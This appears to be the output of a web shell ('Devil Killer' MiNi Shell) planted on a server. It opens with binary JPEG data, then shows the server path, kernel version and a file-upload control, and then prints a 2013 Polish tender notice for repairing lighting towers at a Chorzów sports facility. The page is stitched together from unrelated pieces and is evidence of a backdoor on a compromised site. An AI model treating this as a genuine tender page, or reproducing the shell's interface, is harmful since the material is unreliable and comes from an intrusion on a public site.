JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130619/234860-N-2013.html

<p class="kh_header"><b>Chorzów: Remont wież oświetleniowych na obiekcie przy ul. Cichej  6 w Chorzowie</b><br>
<b>Numer ogłoszenia: 234860 - 2013; data zamieszczenia: 19.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Rekreacji i Sportu , ul. Dąbrowskiego 113, 41-500 Chorzów, woj. śląskie, tel. 032 2417050, 2411313, faks 032 2417055.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wież oświetleniowych na obiekcie przy ul. Cichej  6 w Chorzowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III.2. W skład wykonania zadania wchodzi: 

Rozbiórka i demontaż:
- skucie nierówności betonu.
- skucie elementów betonowych przy stopach wież oświetleniowych.
- cięcie palnikiem stali.
- odbicie tynków.
- wykucie stalowych drzwi.
- ustawienie stanowisk robót wysokościowych na wieżach oświetleniowych.
- wywóz i utylizacja gruzu.

Roboty ziemne
- wykonanie wykopów odcinkowych na gł. do 1m.
- zasypanie wykopów z ubijaniem ziemi.
- podbudowa z kruszyw.

Roboty betonowe:
- reprofilacja podłoża betonowego.
- wykonanie posadzki betonowej gr. 5 cm. z dodatkiem zbrojenia rozproszonego
- wykonanie płyty betonowej fundamentowej zbrojonej.
- wykonanie szczelin dylatacyjnych w betonie z wypełnieniem ich systemową zaprawą dylatacyjną.

Roboty tynkarskie:
- umocowanie siatek tynkarskich, siatka cięto-ciągniona.
- uzupełnienie tynków III kategorii
Roboty malarskie: 
- czyszczenie strumieniowe elementów stalowych wież.
- zabezpieczenie antykorozyjne.
- zabezpieczenie betonowych elementów wież systemową warstwą wodoodporną.
-  pomalowanie stalowych wież dwukrotnie farbą poliwinylową w kolorze RAL podanym przez inwestora jak w przedmiarze robót.
- malowanie tynków farbą emulsyjną

Roboty montażowe:
- montaż stolarki drzwiowej stalowej zewnętrznej wzmocnionej z dwoma zamkami antywłamaniowymi z atestem.

Przedmiot zamówienia został opisany za pomocą STWiOR oraz przedmiaru robót załączonych do niniejszej SIWZ i stanowiących jej integralną część

Uwaga: Zamawiający oświadcza, że przedmiot umowy zrealizowany będzie na czynnym obiekcie, w związku z czym wykonawca zobowiązany będzie  zgodnie z sugestiami zamawiającego do dokonania odpowiedniego zabezpieczenia terenu robót przed dostępem uczestników korzystających z obiektu.

III.3.  Kwotę brutto (na którą składa się cena netto oraz należny podatek VAT) wynikającą                        z kosztorysu ofertowego (kosztorys ofertowy dołączyć do oferty) należy wpisać w załączony formularz ofertowy - załącznik nr 1 do specyfikacji istotnych warunków zamówienia.

III.4. W przypadku wskazanych w dokumentacji nazw urządzeń i materiałów dopuszcza się możliwość zastosowania urządzeń i materiałów równoważnych pod warunkiem posiadania przez nie wszystkich wymaganych dopuszczeń i atestów oraz osiągania parametrów technicznych, jakościowych i eksploatacyjnych nie gorszych od tych ujętych w dokumentacji. Jeżeli wykonawca przewidzi w ofercie zastosowanie urządzeń i materiałów równoważnych, na wykonawcy ciąży obowiązek udowodnienia ich równoważności. Brak jednoznacznego wskazania w ofercie materiałów równoważnych będzie oznaczać wykonanie przedmiotu zamówienia z zastosowaniem urządzeń i materiałów wg  istniejącej dokumentacji 

III.5.  Przedmiot zamówienia należy objąć co najmniej 36 miesięczną gwarancją.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.26.23.50-9, 45.41.00.00-4, 45.44.21.00-8, 45.22.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca winien wnieść wadium  w wysokości 2.000,00 zł (dwa tys. zł.) przed upływem terminu składania ofert tj. w nieprzekraczalnym terminie do dnia 04.07.2013r.r. do godz..9:00
2. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy  jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz.  
730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Jeżeli wadium jest wnoszone w pieniądzu, należy je wpłacić przelewem na  wskazany  rachunek bankowy Zamawiającego: 45 1050 1243 1000 0022 4984 4891

Wniesienie wadium w pieniądzu będzie skuteczne, gdy wpływ środków na rachunek zamawiającego nastąpi przed upływem terminu składania ofert. 

Jeżeli wadium jest wnoszone w formie innej niż pieniądz, oryginały dokumentów, o których mowa wyżej należy złożyć w kasie, natomiast do oferty należy załączyć ich kserokopię. 
Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
3. Zamawiający dokonuje zwrotu wadium oraz żąda ponownego wniesienia wadium zgodnie z warunkami określonymi  w art. 46 ust. 1, 1a, 2 i 3 ustawy - Prawo zamówień publicznych. 
4.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń potwierdzających spełnienie  warunków udziału w postępowaniu, o których mowa w art. 25 ust. 1, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
	1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 	w ofercie;
	2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
	3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 	leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia Zamawiający żąda następujących dokumentów:
-wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Dowodami, o których mowa wyżej jest poświadczenie. Zamiast poświadczenia przez okres 12 miesięcy od dnia wejścia w życie rozporządzenia w sprawie rodzajów dokumentów, tj. od dnia 20.02.2013, Wykonawca może przedkładać dokumenty potwierdzające należyte wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie.

Za zadanie odpowiadające swoim rodzajem, wartością, Zamawiający uzna wykonanie:
- co najmniej jedna ukończona realizacja (1 robota) na kwotę min 80.000,00 zł. brutto, (np. wykonanie robót budowlanych lub renowacji konstrukcji stalowych na wysokościach), odpowiadającą swoim rodzajem i zakresem robotom stanowiącym przedmiot zamówienia, z podaniem daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wzór wykazu stanowi załącznik nr 6 do SIWZ. 
Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu niezbędnym do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy (wiedza i doświadczenie innych podmiotów), a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający  żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdz. VI pkt. A ust.1 pkt. 1, 2, 3, 5</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że:
dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, a mianowicie:
- 1 osoba - kierownik budowy posiadający uprawnienia w ograniczonym zakresie w specjalności konstrukcyjno- budowlanej,
wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności , oraz informacją o podstawie do dysponowania tymi osobami. Należy przedłożyć oświadczenia, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia. (wykaz osób zał. nr 2 do SIWZ)

Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na osobach zdolnych do wykonania zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował osobami zdolnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy (osoby zdolne do wykonania zamówienia), a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający  żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdz. VI pkt. A ust.1 pkt. 1, 2, 3, 5</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że:
posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności
związanej z przedmiotem zamówienia w wysokości nie niższej niż 70.000,- zł.

Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy (zdolności finansowej innych podmiotów), a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający  żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdz. VI pkt. A ust.1 pkt. 1, 2, 3, 5</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
a.  posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania 
b.   posiadania wiedzy i doświadczenia 
c. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do   wykonania zamówienia 
d.  sytuacji ekonomicznej i finansowej 
e.  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
Nie podlegać wykluczeniu z postępowania o udzieleniu zamówienia na podstawie art. 24 ust. 1 i 2 ustawy PZP.

Opis sposobu dokonania oceny spełniania warunku:
Wykonawca musi oświadczyć, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy PZP.

Wykonawcy wspólnie ubiegający się o zamówienie warunki, o których mowa w rozdziale V pkt 1,2, 3 SIWZ mogą spełniać łącznie, a warunek, o którym mowa w rozdziale V pkt 4 SIWZ musi spełniać każdy Wykonawca samodzielnie.
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie złożonych do oferty dokumentów i oświadczeń według kryterium spełnia , nie spełnia
Wykonawca niespełniający któregokolwiek z warunków udziału w postępowaniu zostanie wykluczony na podstawie art. 24 ust. 1-2 ustawy PZP.
-oświadczenia Wykonawcy o niepodleganiu wykluczeniu na postawie art. 24 ust 1  ustawy Pzp -załącznik nr 4 do siwz
- oświadczenia Wykonawcy, iż spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 pkt. 1 - 3 ustawy Pzp - załącznik nr 5 do siwz.
4. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdz. VI pkt.A ust. 2 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się  także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Reguły określone w rozdz. VI pkt.A ust.4 SIWZ stosuje się odpowiednio. 
-W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
-W przypadku składania oferty przez Wykonawców ubiegających się wspólnie, dokumenty wymienione w rozdz. VI pkt. A ust. 1 muszą być złożone przez każdego uczestnika konsorcjum oddzielnie, zaś dokumenty wymienione w rozdz. VI pkt. B, C, D  Wykonawcy mogą złożyć łącznie. 

Przesłanki skutkujące wykluczeniem wykonawcy z postępowania, określone w art. 24 ust. 1 ustawy Pzp odnoszą się do każdego z członków konsorcjum oddzielnie. Oznacza to, że oświadczenie o niepodleganiu wykluczeniu z postępowania musi zostać złożone oddzielnie przez każdego z konsorcjantów lub przez pełnomocnika konsorcjum w imieniu każdego z konsorcjantów. 

Ponadto, Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić Pełnomocnika. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Jeżeli oferta Wykonawców  ubiegających się wspólnie o udzielenie zamówienia zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia umowy regulującej współpracę tych Wykonawców.

-Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takim przypadku Wykonawca zobowiązany jest udowodnić zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
- Inne uwarunkowania: 
Należy przedłożyć: 
1. Wypełniony formularz ofertowy - załącznik nr 1 do SIWZ,
2. Dokument zobowiązania podmiotu trzeciego potwierdzający dysponowaniem wiedzą i doświadczeniem, potencjałem technicznym, zdolnościach finansowych z którego wynikać będzie udział takiego podmiotu w wykonywaniu zamówienia (załączyć jeżeli dotyczy, jeżeli Wykonawca zamierza polegać na wiedzy, doświadczeniu, potencjale technicznym lub osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków podmiotu trzeciego). 
